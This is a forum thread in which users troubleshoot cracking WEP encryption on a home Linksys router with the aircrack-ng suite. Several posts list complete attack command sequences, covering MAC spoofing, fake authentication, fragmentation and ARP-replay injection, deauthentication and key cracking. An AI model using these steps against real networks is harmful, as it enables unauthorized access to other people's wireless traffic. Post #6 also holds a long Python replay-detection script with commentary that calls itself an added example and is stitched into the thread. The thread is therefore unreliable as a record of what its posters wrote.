Thread: Can't seem to crack WEP, despite following instructions

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Can't seem to crack WEP, despite following instructions

    Hi everyone, I imagine you probably get asked this question quite frequently, but I've looked around for an answer to my question and I haven't found anything. I tried cracking the WEP encryption (128-bit hex) on my Linksys WRT54GS' wireless signal using my Acer Aspire One (with the integrated Atheros Wi-Fi chip), but when I reach the final step where I launch aircrack, the amount of IVs never goes above 31. In addition, my interface seems to be very strange. It looks like ath0 is a VAP created by wifi0 or something like that. These are the steps I followed.

    - Open konsole
    - airmon-ng stop ath0
    - ifconfig wifi0 down
    - macchanger -m 00:11:22:33:44:55 wifi0
    - airmon-ng start wifi0
    - airodump-ng ath0
    - Press Ctrl+C to stop scan
    - airodump-ng -c [channel, in my case, 3] -w wep --bssid [MAC address of AP] ath0
    - Open new konsole, leaving old one open in background
    - aireplay-ng -1 0 -a [MAC address of AP] -h 00:11:22:33:44:55 ath0
    - aireplay-ng -5 -b [MAC address of AP] -h 00:11:22:33:44:55 ath0
    - packetforge-ng -0 -a [MAC address of AP] -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y [location of keystream] -w ARP
    - aireplay-ng -2 -r ARP ath0
    - Open new konsole, leaving both of the old ones open in the background
    *NOTE: Up to this point, everything seemed to work similarly to the way it worked in the video*
    - aircrack-ng wep-01.cap
    *At the part where it says "got x IVS", it never increases from 31, no matter how long I leave it. Does anyone know what was wrong with this method? Thanks in advance for a reply.*

  2. #2
    Junior Member
    Join Date
    Mar 2010
    Posts
    44


    Sorry, no idea. Have you tried isolating different parts of this process from the rest? Kismet, for instance, can put your computer into monitor mode (automatically) and also collects IVs (and other things). Does the same problem arise with Kismet? Or when using iwconfig in place of airmon-ng? Perhaps your copy of aircrack-ng results from a bad download; you might try reinstalling it. Finding out what does work ought to help you figure out what doesn't. Please report back to us, I for one am curious about your situation. Good luck, Kurt

  3. #3
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4


    Hi, thanks for the quick response. I've tried isolating parts of the procedure, but it seems that everything works fine save for that final aircrack-ng wep-01.cap command. If I try to open Kismet, it gives me this error message:

    Suid priv-dropping disabled. This may not be secure.
    No specific sources given to be enabled, all will be enabled
    Enabling channel hopping
    Enabling channel splitting.
    FATAL: No packsources were enabled. Make sure that if you use an enablesource line that you specify the correct sources

  5. #5
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908


    The basic commands I use, after bringing your card into monitor mode and substituting names where applicable, are:

    Code:
    airodump-ng -c 3 --bssid 00:01:02:03:04:05 -w dump ath0
    aireplay-ng -1 0 -e "network-name" -a 00:01:02:03:04:05 -h 00:04:05:06:07:08 ath0
    aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 ath0
    aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:05:06:07:08:09 ath0
    aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
    Try those out and see if the same occurs....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  6. #6
    Just burned his ISO su_pyrow's Avatar
    Join Date
    Jan 2010
    Posts
    11


    add -b to aircrack-ng
    aircrack-ng wep*.cap -b (mac of ap)

    Hey, what's up? Everything looks good. However, let's just try something.
    These are the steps you took. Let's add --ivs to step #7, just before ath0:

    airodump-ng -c 3 -w wep --bssid (mac of ap) --ivs ath0
    Now you will have a single wep.ivs file and/or a series of them. (wep.ivs comes from your "-w wep" above.) When it comes time to use aircrack-ng (at 20,000 IVs or so; try every 5,000), run it like this:

    aircrack-ng *.ivs -b (mac of ap)
    That will combine all of them together, so you should get more than 31 IVs. You probably already have all the files you need; they just need to be combined to be cracked.

    You could also try

    aircrack-ng *.cap -b (mac of ap)
    1. airmon-ng stop ath0
    2. ifconfig wifi0 down
    3. macchanger -m 00:11:22:33:44:55 wifi0
    4. airmon-ng start wifi0
    5. airodump-ng ath0
    6. Press Ctrl+C to stop scan
    7. airodump-ng -c 3 -w wep --bssid [MAC AP] ath0
    8. Open new konsole, leaving old one open in background
    9. aireplay-ng -1 0 -a [MAC address of AP] -h 00:11:22:33:44:55 ath0
    10. aireplay-ng -5 -b [MAC address of AP] -h 00:11:22:33:44:55 ath0
    ......

    See how that works.

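    The "got N IVs" figure the thread keeps coming back to is a count of distinct initialisation vectors per BSSID, so a frame re-injected hundreds of times contributes a single IV no matter how long the replay runs; from the network owner's side, that same replay shows up in a capture as one encrypted frame repeated verbatim from one sender. The script below is an added example, not code from the thread or from the aircrack-ng project: it parses raw 802.11 data frames (it assumes the radiotap or PPI link-layer header has already been stripped), counts distinct WEP IVs per BSSID, and flags senders that repeat an identical protected frame more than a chosen number of times, which is the kind of check a wireless IDS runs to spot ARP-replay traffic. The MAC addresses, the 20-copy threshold and the sample traffic are all constructed for the example.

```python
# Added example (not from the thread): count distinct WEP IVs per BSSID over
# raw 802.11 frames and flag replayed (verbatim-repeated) protected frames.
from collections import Counter, defaultdict
import struct

AP = bytes.fromhex("000102030405")        # constructed BSSID
STATION = bytes.fromhex("0a0b0c0d0e0f")   # constructed legitimate client
INJECTOR = bytes.fromhex("001122334455")  # constructed spoofed sender MAC
BROADCAST = b"\xff" * 6


def build_wep_frame(to_ds, addr1, addr2, addr3, seq, iv, body):
    """Test fixture: a minimal protected 802.11 data frame (no real RC4, ICV is a placeholder)."""
    assert len(iv) == 3
    fc0 = 0x08                               # type 2 (data), subtype 0
    fc1 = 0x40 | (0x01 if to_ds else 0x02)   # Protected Frame bit + ToDS or FromDS
    hdr = struct.pack("<BBH6s6s6sH", fc0, fc1, 0, addr1, addr2, addr3, seq << 4)
    key_id_octet = bytes([0 << 6])           # key index 0, Ext IV bit clear (plain WEP)
    return hdr + iv + key_id_octet + body + b"\x00\x00\x00\x00"


def parse_wep_frame(frame):
    """Return (bssid, sender, iv, body) for a WEP-protected data frame, else None."""
    if len(frame) < 24 + 4 + 4:              # header + IV/key id + ICV minimum
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x03 != 2:               # not a data frame
        return None
    if not fc1 & 0x40:                       # Protected Frame bit clear: plaintext
        return None
    to_ds, from_ds = fc1 & 0x01, fc1 & 0x02
    if to_ds and from_ds:                    # 4-address WDS frames are out of scope here
        return None
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    bssid = a1 if to_ds else (a2 if from_ds else a3)
    hdr_len = 24 + (2 if fc0 & 0x80 else 0)  # QoS data subtype adds a 2-byte QoS Control field
    iv = bytes(frame[hdr_len:hdr_len + 3])
    if frame[hdr_len + 3] & 0x20:            # Ext IV bit set: TKIP/CCMP, not WEP
        return None
    body = bytes(frame[hdr_len + 4:-4])      # encrypted payload without the 4-byte ICV
    return bytes(bssid), bytes(a2), iv, body


def analyse(frames, replay_threshold=20):
    """Return ({bssid: distinct IV count}, [(sender, iv_hex, copies)]) for a list of frames."""
    ivs = defaultdict(set)
    copies = Counter()
    for frame in frames:
        parsed = parse_wep_frame(frame)
        if parsed is None:
            continue
        bssid, sender, iv, body = parsed
        ivs[bssid].add(iv)                   # the figure aircrack-ng reports as "got N IVs"
        copies[(sender, iv, body)] += 1      # identical protected frame seen again
    iv_counts = {b.hex(":"): len(s) for b, s in ivs.items()}
    replays = [(s.hex(":"), iv.hex(), n)
               for (s, iv, _), n in copies.items() if n >= replay_threshold]
    return iv_counts, replays


def sample_capture():
    """Constructed traffic: 31 ordinary client frames plus one frame replayed 200 times."""
    frames = []
    for i in range(31):
        iv = struct.pack(">I", 0x100000 + i)[1:]           # a fresh 3-byte IV per frame
        frames.append(build_wep_frame(True, AP, STATION, BROADCAST, i, iv, b"\x11" * 36))
    arp_sized = build_wep_frame(True, AP, INJECTOR, BROADCAST, 31, b"\xab\xcd\xef", b"\x22" * 36)
    frames.extend([arp_sized] * 200)                       # verbatim re-injection
    return frames


def run():
    return analyse(sample_capture())


if __name__ == "__main__":
    counts, flagged = run()
    print("distinct IVs per BSSID:", counts)   # 231 frames, but only 32 distinct IVs
    print("replayed frames:", flagged)
```

    The output makes the thread's number concrete: 231 protected frames yield only 32 distinct IVs, because the 200 re-injected copies all carry the same one. On a real airodump-ng capture the frames would first have to be pulled out of the .cap container and stripped of their radiotap header (for example with a pcap library), and the threshold would be tuned to the network's normal retransmission rate.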
  7. #7
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4


    Thanks a lot! I was able to follow su_pyrow's modifications to make it work flawlessly. All I did was add --ivs to step 7 and change my final aircrack-ng step to:
    aircrack-ng *.ivs -b [AP's MAC address]

    I guess now I'll be setting up a WPA network and trying to crack that. Thanks again!

  8. #8
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    1

    Just one question...

    Hi there!

    I'm using the very same hardware as you, but I'm a real newbie with Linux, and when I follow your instructions (which seem to work) I just get stuck at the "LOCATION OF KEYSTREAM" part....

    I just can't figure out what it is.

    I'm sure someone can help me with that!!!

    Thanks!!
